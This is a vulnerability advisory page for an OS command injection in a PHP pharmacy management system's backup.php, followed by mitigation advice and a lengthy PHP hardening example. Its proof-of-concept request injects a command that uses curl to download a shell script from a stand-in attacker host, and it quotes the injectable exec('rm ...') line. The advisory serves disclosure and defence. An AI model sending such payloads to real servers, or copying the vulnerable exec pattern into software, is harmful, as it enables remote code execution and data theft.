| Title | Sourcecodester Web-based Pharmacy Product Management System edit-product v1.0 Command Injection |
|---|
| Description | **Critical Security Advisory: Remote Command Execution in Pharmacy Management System**
**Vulnerability Summary**
Title: Unauthenticated RCE via Database Backup Functionality
Affected Version: Web-based Pharmacy Product Management System ≤ v1.0
Risk Level: Critical (CVSS 9.8)
Discovery: yaklang.io, IRify, Yakit
**Core Vulnerability Analysis**
1. **Insecure Implementation**:
- Backup functionality accepts unvalidated user input for database credentials (servername, username, password, dbname)
- Directly interpolates user-controlled $dbname into:
* File path construction ($backup_file_name)
* System command execution (exec() call)
2. **Attack Chain**:
① Attacker controls all database connection parameters
② Exploits path normalization in file operations
③ Achieves arbitrary command execution via:
```php
exec('rm ' . $backup_file_name); // $dbname is attacker-controlled, leading to RCE
```
**Technical Impact**
- Full system compromise via arbitrary command execution
- Potential PHI/PII data exfiltration (HIPAA violation)
- Possible ransomware deployment
- Supply chain contamination risk
**Proof of Concept**
```http
POST /backup.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
txtservername=attacker-mysql&txtusername=user&txtpassword=pass&txtdbname=./;curl${IFS}attacker.com/shell.sh${IFS}-o/../tmp/shell;./
```
**Mitigation Strategy**
1. **Immediate Actions**:
- Disable backup.php functionality
- Implement input validation:
```php
// Strips every character outside the allowlist; rejecting the request on a mismatch is stricter still
$dbname = preg_replace('/[^a-zA-Z0-9_-]/', '', $_POST['txtdbname']);
```
2. **Secure Coding Practices**:
- Use parameterized database connections
- Implement secure file operations:
```php
$backup_dir = '/secured/backups/';
// realpath() returns false if the directory does not exist; check it before building the path
$safe_path = realpath($backup_dir).DIRECTORY_SEPARATOR.basename($dbname).'.sql';
```
3. **System Hardening**:
- Implement least privilege for web server user
- Deploy WAF with command injection rules
- Conduct forensic audit of affected systems
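The following is an added example, not code from the advisory or the Sourcecodester project, that ties the Core Vulnerability Analysis to the Mitigation Strategy above: it shows a backup handler that validates `txtdbname` against the advisory's allowlist, confines the output file with `realpath()` and `basename()`, shell-quotes every `mysqldump` argument with `escapeshellarg()`, and deletes the file with `unlink()` instead of `exec('rm ...')`. It assumes PHP 8+, that the original handler shells out to `mysqldump`, and the request field names listed in the advisory; `validate_dbname`, `safe_backup_path`, `build_dump_command`, `handle_backup_request` and the `$config` array are hypothetical names.

```php
<?php
// Added hardening example for the backup.php pattern described in the
// advisory; it is not the project's code. Assumptions: PHP 8+, the handler
// shells out to mysqldump, and the request field names (txtservername,
// txtusername, txtpassword, txtdbname) are those listed in the advisory.
// All function names and the $config array are hypothetical.
declare(strict_types=1);

// Allowlist check using the advisory's character class. The request is
// rejected rather than silently rewritten, so a value like the PoC's
// "./;curl..." never reaches a file path or a shell.
function validate_dbname(string $dbname): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $dbname) === 1 ? $dbname : null;
}

// Confine the output file to a fixed directory. realpath() returns false for
// a missing directory (which would otherwise root the path at "/"), and
// basename() drops any directory components that survived validation.
function safe_backup_path(string $backup_dir, string $dbname): ?string
{
    $base = realpath($backup_dir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    $path = $base . DIRECTORY_SEPARATOR . basename($dbname) . '.sql';
    // Defense in depth: the final path must still lie below the base directory.
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

// Build the dump command with every argument shell-quoted. Connection
// parameters come from server-side configuration, not from the request, which
// removes the "attacker controls all connection parameters" step from the
// attack chain; escapeshellarg() still guards against odd characters in them.
function build_dump_command(array $config, string $dbname, string $outfile): string
{
    return 'mysqldump'
        . ' --host=' . escapeshellarg($config['host'])
        . ' --user=' . escapeshellarg($config['user'])
        // A password on the command line is visible in the process list;
        // production code should prefer MYSQL_PWD or --defaults-extra-file.
        . ' --password=' . escapeshellarg($config['pass'])
        . ' --result-file=' . escapeshellarg($outfile)
        . ' ' . escapeshellarg($dbname);
}

// Request handler: validate, confine, run, and clean up with unlink() instead
// of exec('rm ' . $file), so no second shell command is built from data the
// client influenced.
function handle_backup_request(array $post, array $config, string $backup_dir): array
{
    $dbname = validate_dbname((string)($post['txtdbname'] ?? ''));
    if ($dbname === null) {
        // Log the rejected value for detection: shell metacharacters here are a
        // strong signal of an exploitation attempt against this endpoint.
        error_log('backup.php rejected txtdbname=' . json_encode($post['txtdbname'] ?? ''));
        return ['ok' => false, 'error' => 'invalid database name'];
    }
    $outfile = safe_backup_path($backup_dir, $dbname);
    if ($outfile === null) {
        return ['ok' => false, 'error' => 'backup directory unavailable'];
    }
    exec(build_dump_command($config, $dbname, $outfile) . ' 2>/dev/null', $output, $status);
    if ($status !== 0) {
        if (is_file($outfile)) {
            unlink($outfile);   // plain filesystem call, no exec('rm ...')
        }
        return ['ok' => false, 'error' => 'mysqldump failed'];
    }
    return ['ok' => true, 'file' => $outfile];
}

// Constructed CLI demo (not part of the advisory): a benign name beside a
// traversal attempt and a value carrying shell metacharacters, checked against
// a temporary directory without touching any database.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pharmacy-backups-demo';
    is_dir($dir) || mkdir($dir, 0700);
    foreach (['pharmacy_db', '../pharmacy_db', 'pharmacy_db; id'] as $name) {
        $valid = validate_dbname($name);
        printf("%-22s -> %s\n", json_encode($name),
            $valid === null ? 'REJECTED' : safe_backup_path($dir, $valid));
    }
}
```

Run from the command line to see the first name resolve to a path below the temporary directory and the other two rejected before any path or command is built. The handler deliberately stops accepting connection parameters from the client; if a deployment genuinely needs a user-selectable database, the name should additionally be checked against the list of databases the configured account is meant to back up, and the `error_log()` line gives the forensic audit recommended above a concrete signal to search for.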
**Compliance Implications**
This vulnerability constitutes:
- HIPAA Security Rule violation (§164.308)
- PCI DSS Requirement 6.5.1 non-compliance
- GDPR Article 32 breach notification requirement
**References**
- CWE-78: OS Command Injection
- OWASP Top 10 2021: A03 Injection
- NIST SP 800-115: Command Injection Countermeasures
**Note**: This vulnerability enables complete system takeover. Organizations should assume compromise and initiate incident response procedures immediately. |
|---|
| Source | https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/rce_in_backup.md |
|---|
| User | lingze (UID 83608) |
|---|
| Submission | 04/08/2025 16:42 (12 months ago) |
|---|
| Moderation | 04/16/2025 15:38 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 305075 [SourceCodester Web-based Pharmacy Product Management System 1.0 Database Backup backup.php txtdbname os command injection] |
|---|
| Points | 20 |
|---|